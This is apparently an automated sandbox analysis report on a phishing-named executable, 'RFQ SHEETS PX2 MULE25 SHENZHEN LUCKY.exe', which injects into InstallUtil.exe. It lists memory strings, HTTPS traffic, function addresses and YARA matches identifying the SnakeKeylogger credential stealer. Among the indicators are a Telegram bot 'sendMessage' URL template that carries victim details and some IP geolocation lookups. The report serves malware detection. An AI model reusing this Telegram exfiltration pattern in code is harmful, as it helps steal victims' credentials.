                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478037027.0000000006850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20a
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enp
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeString found in binary or memory: https://sectigo.com/CPS0
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003F1F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003F1F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003E23000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2994301420.0000000003C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: InstallUtil.exe, 00000005.00000002.2994301420.0000000003E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002D83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002D83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49946 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 7968, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080ABA18 CreateProcessAsUserW,0_2_080ABA18
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_017274350_2_01727435
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0172B4090_2_0172B409
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_01727A780_2_01727A78
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0172B7490_2_0172B749
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0172B7A50_2_0172B7A5
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0172B94A0_2_0172B94A
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0172B8E70_2_0172B8E7
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_066576E80_2_066576E8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_066576D30_2_066576D3
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_06812E080_2_06812E08
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_068115C80_2_068115C8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_06820E500_2_06820E50
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0682EBBC0_2_0682EBBC
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0682DFE80_2_0682DFE8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0682CF500_2_0682CF50
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0682F4800_2_0682F480
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_068252C00_2_068252C0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0682DFD80_2_0682DFD8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0682CF110_2_0682CF11
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_068268080_2_06826808
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_068268400_2_06826840
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0682F4710_2_0682F471
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A6C790_2_080A6C79
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A45100_2_080A4510
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A11E00_2_080A11E0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A9B700_2_080A9B70
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080ABF980_2_080ABF98
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A5FE00_2_080A5FE0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A10280_2_080A1028
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A10380_2_080A1038
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A04D20_2_080A04D2
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A04E00_2_080A04E0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A1CE00_2_080A1CE0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A44FF0_2_080A44FF
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A55280_2_080A5528
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A89680_2_080A8968
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A89780_2_080A8978
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A1D900_2_080A1D90
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A0DB00_2_080A0DB0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A0DC00_2_080A0DC0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A11D00_2_080A11D0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080AA2D80_2_080AA2D8
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A0B790_2_080A0B79
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A0B880_2_080A0B88
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A07DE0_2_080A07DE
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080A5FD00_2_080A5FD0
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080B55400_2_080B5540
